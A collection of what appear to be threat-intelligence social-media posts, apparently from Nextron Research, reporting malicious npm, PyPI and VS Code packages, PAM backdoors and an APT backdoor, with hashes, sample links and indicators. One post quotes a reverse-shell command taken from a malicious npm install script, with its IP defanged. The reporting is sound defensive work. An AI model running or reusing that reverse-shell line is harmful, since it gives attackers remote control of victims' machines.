Found a bunch of related low detection samples. They are live on abuse.ch MalwareBazaar bazaar.abuse.ch/browse/tag/Myt… Hashes: d6a02f9ac2e9e675b88b28b9abda97e7 a29fedaa6fb77d626ae6690081002e15 5a749cb47bc62ae8adb00997b7c1875d e180bd5b6524313c0c1f4ecc9a925e02

Stealth mode at its finest. 🚀 8d16022dcfc9f2dc553d47e9c223425b45cdb015cab8468136d530eb66d2226c

Beyond availability - toward verified recovery Backups should do more than bring systems back online - they should bring them back clean. Together with Veeam® Software, we’ve built an integration that adds forensic assurance to backup workflows. THOR extends Veeam’s trusted recovery

#IndonesianFoods NPM worm is covered by THOR scanner detections THOR APT Scanner Nextron Research ⚡️

Simple but effective PAM backdoors — one is 3 years old — still showing _0 detections_ on VirusTotal. All use hard-coded password checks to bypass authentication and spawn a shell. All samples were uploaded by India-geolocated submitters 🇮🇳. Hashes in reply.

New backdoor called #kalim used by #muddywater APT group. multi-threaded C2 tool with AES encryption, file transfer capabilities, and persistent command execution sample: virustotal.com/gui/file/0c807… sample: virustotal.com/gui/file/2fb21… c2: moodleuni[.]com

The SHA1-Hulud npm mess keeps growing, so we added additional detections for it today - new YARA rules by my colleague Marius Benthin in our public signature-base - cover bun_environment.js / setup_bun.js and the malicious preinstall script variants from the Wiz / Aikido

NPM package "baidu-src-test*" spawning reverse shell on installation via (pre)install script. sh -i >& /dev/tcp/43[.]160[.]194[.]214/53 0>&1 virustotal.com/gui/file/ee880… Nextron Research ⚡️ #NPM #THOR

We spotted a malicious #VSCode (Visual Studio Code) extension today in our artifact-scanning pipeline. It appeared under a name that tries to pass itself off as the popular Material Icon Theme. A new 5.29.1 version was pushed today (28.11., 11:34) and the update contains two Rust implants –

Follow-up on yesterday’s VS Code extension case: we finished the malware analysis of the Rust implants Solana-based C2, AES-encrypted JS stages, and a Google Calendar fallback channel with invisible Unicode tricks Write-up is here nextron-systems.com/2025/11/29/ana… by Marius Benthin

Glassworm returned in a big way during the holiday. We're tracking 23 code extensions across the VS Marketplace and Open VSX which copy popular extensions, evade filters, manipulate their download counts, and then update with sinister malware. secureannex.com/blog/glassworm…

Malicious NPM package imitating expressjs/multer. It downloads payload from Google Firebase Storage. npmjs.com/package/multer… SHA-256: 3d3ebabe63cc6128194440210bffbafeac95c9a23bf294711a8637aa857b3648 #NPM #Google Nextron Research ⚡️

We Nextron Research ⚡️ scan many public repos like npm, pypi, vscode marketplace etc. And we find a lot of shitty malware :) Example: pypi.org/project/multit… SHA256: 79cc98d0831e7b6a191000ec997ebc1853b1f6cc1190dbb855b97d7bf418c287 #PyPi

This is more fun than I anticipated :D Another malicious NPM package found and identified by our automatic package repo scanning powered by THOR PKG: npmjs.com/package/extend… SHA256: 5f1830432909d7adc3bbfc3b33d60234460a0d763214578ed339040431767b97 0 Detections on VirusTotal